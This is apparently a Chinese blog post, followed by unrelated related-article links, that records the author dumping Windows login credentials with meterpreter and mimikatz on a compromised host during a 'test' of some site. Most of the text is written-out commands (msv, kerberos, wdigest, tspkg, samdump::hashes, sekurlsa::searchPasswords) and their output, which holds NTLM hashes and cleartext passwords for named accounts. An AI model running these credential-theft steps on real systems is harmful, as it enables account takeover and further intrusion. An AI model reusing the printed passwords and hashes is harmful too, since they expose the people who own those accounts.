meterpreter读取hash明文记录
今天测试某个站点时读hash老出错 这里做下读hash的笔记
进去meterpreter后getuid一
|
1
2
|
meterpreter > getuidServer username: NT AUTHORITY\SYSTEM |
加载mimikatz模块
|
1
2
|
meterpreter > load mimikatzLoading extension mimikatz...Success. |
加载成功.
获取登录密码的hash值
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > msv[+] Running as SYSTEM[*] Retrieving msv credentialsmsv credentials===============AuthID Package Domain User Password------ ------- ------ ---- --------0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)0;49101 NTLM n.s. (Credentials KO)0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO) |
上面已经是得到hash值了. 下面算明文密码.
获取明文密码
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
拿到登录的明文密码了.
不过也有一些特殊的情况, 例如这样
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID Package Domain User Password------ ------- ------ ---- --------0;10408969 NTLM CLOUDVM Administrator0;266228 NTLM CLOUDVM Administrator0;997 Negotiate NT AUTHORITY LOCAL SERVICE0;996 Negotiate WORKGROUP CLOUDVM$0;23595 NTLM0;999 NTLM WORKGROUP CLOUDVM$ |
哈希值也获取不到,
使用另一种方式获取哈希值
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
meterpreter > mimikatz_command -f samdump::hashesOrdinateur : chenglee-PCBootKey : 0648ced51b6060bed1a3654e0ee0fd93Rid : 500User : AdministratorLM :NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0Rid : 501User : GuestLM :NTLM :Rid : 1000User : chengleeLM :NTLM : 8d0f8e1a18236379538411a9056799f5 |
ok, 获取到了,
根据上面的方式获取明文密码
|
1
2
3
4
5
6
7
8
|
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { chenglee ; chenglee-PC ; lizhenghua }[1] { chenglee ; chenglee-PC ; lizhenghua }[2] { chenglee ; chenglee-PC ; lizhenghua }[3] { chenglee ; chenglee-PC ; lizhenghua }[4] { chenglee-PC ; chenglee ; lizhenghua }[5] { chenglee-PC ; chenglee ; lizhenghua }meterpreter > |
2
|
1
2
3
|
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { Administrator ; CLOUDVM ; 1244567 }[1] { Administrator ; CLOUDVM ; 1244567 } |
都拿到了
另外提一下更简洁的方式,就是 wdigest命令了,
这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > wdigest[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
还有一个跟wdigest一样的就是tspkg啦
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > tspkg[+] Running as SYSTEM[*] Retrieving tspkg credentialstspkg credentials=================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
meterpreter读取hash明文记录的更多相关文章
- Access,MSSQL:随机读取N条记录
今天试着将一个网站使用的mssql转换为Access,但网站首页有一段代码是随机读取n条记录: SQL Server:Select TOP N * From TABLE Order By NewID( ...
- 用C读取系统明文(附源码)
从一好朋友那得到一个好东西 可以读取系统明文 请用vc++ 6.0编译 #include <windows.h> #include <stdio.h> // // Vsbat[ ...
- PHP 读取逐条数据库记录,以及提交下拉菜单选项
<?php $db_host=localhost; //MYSQL服务器名$db_user=root; //MYSQL用户名$db_pass="******"; //MYSQ ...
- 玩下软工项目,第一轮--全局Context的获取,SQLite的建立与增删改查,读取用户通话记录信息
项目的Github地址:https://github.com/ggrcwxh/LastTime 采用基于git的多人协作开发模式 软件采用mvc设计模式,前端这么艺术的事我不太懂,交给斌豪同学去头疼了 ...
- Snort里如何将读取的包记录存到指定的目录下(图文详解)
不多说,直接上干货! 比如,在/root/log目录下. [root@datatest ~]# snort -dve -l /root/log 需要注意: 1) /log目录需要你自己建立,并修改权限 ...
- CKPlayer从Cookie里读取上次播放记录的一个demo
<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content=& ...
- 读取Excel的记录并导入SQL数据库
准备一下,近段时间,需要把Excel的数据导入数据库中. 引用命名空间: using System.Configuration; using System.Data; using System.Dat ...
- Snort里如何将读取的包记录存到二进制tcpdump文件下(图文详解)
不多说,直接上干货! 如果网络速度很快,或者想使日志更加紧凑以便以后的分析,那么应该使用二进制的日志文件格式.如tcpdump格式或者pcap格式. 这里,我们不需指定本地网络了,因为所以的东西都被 ...
- 现有有N个学生的数据记录,每个记录包括学号、姓名、三科成绩。 编写一个函数input,用来输入一个学生的数据记录。 编写一个函数print,打印一个学生的数据记录。 在主函数调用这两个函数,读取N条记录输入,再按要求输出。 N<100
#include <iostream> using namespace std; struct student {char num[100]; char name[100]; int ...
随机推荐
- hive 包含操作(left semi join)(left outer join = in)迪卡尔积
目前hive不支持 in或not in 中包含查询子句的语法,所以只能通过left join实现. 假设有一个登陆表login(当天登陆记录,只有一个uid),和一个用户注册表regusers(当天注 ...
- 关于纯xmlhttprequest请求服务器数据
今天我们的web技术已经相当的完善, 各种前端框架如jquery或者再深一点的工具APIcloud 的使用极大的方便了我们的开发工作. 今天我要分享一个纯javascript的方式来解决请求服务器数据 ...
- List<Object> 多条件去重
上一篇将到根据某一条件去重List<Object> 对象链表.本文章根据多条件去重List<Object>去重 private List<StaingMD0010> ...
- cmd中添加目录md
md 创建目录. MKDIR [drive:]pathMD [drive:]path 如果命令扩展被启用,MKDIR 会如下改变: 如果需要,MKDIR 会在路径中创建中级目录.例如: 假设 \a 不 ...
- 05 (OC) 二叉树 深度优先遍历和广度优先遍历
总结深度优先与广度优先的区别 1.区别 1) 二叉树的深度优先遍历的非递归的通用做法是采用栈,广度优先遍历的非递归的通用做法是采用队列. 2) 深度优先遍历:对每一个可能的分支路径深入到不能再深入 ...
- 【赶快收藏】Hystrix实战,优雅提升系统的鲁棒性
背景 最近接手了一个系统,其功能都是查询.查询分了两种方式,一种是公司集团提供的查询能力,支持全国各个省份的查询,但是业务高峰期时服务响应比较慢:另外一种是各省的分公司都分别提供了对应的查询能力,但是 ...
- 将字符串转换成json格式
1.引入json依赖,在pom.xml文件里添加如下内容 <!--Json array start --> <dependency> <groupId>common ...
- DOM之事件(一)
DOM事件,就是浏览器或用户针对页面可以做出的某种动作,我们称这些动作为DOM事件.它是用户和页面交互的核心.当动作发生(事件触发)时,我们可以为其绑定一个或多个事件处理程序(函数),来完成我们想要实 ...
- 【linux】【Zookeeper】Centos7安装Zookeeper-3.5.5
一 .下载zookeeper wget http://mirror.bit.edu.cn/apache/zookeeper/zookeeper-3.5.5/apache-zookeeper-3.5.5 ...
- 生产环境轻量级dns服务器dnsmasq搭建文档
dnsmasq搭建文档 一.生产环境域名解析问题 之前生产环境设备较少,是通过维护master(192.168.1.1)设备的hosts文件实现的.每次新增设备后,需要在master的hosts文件中 ...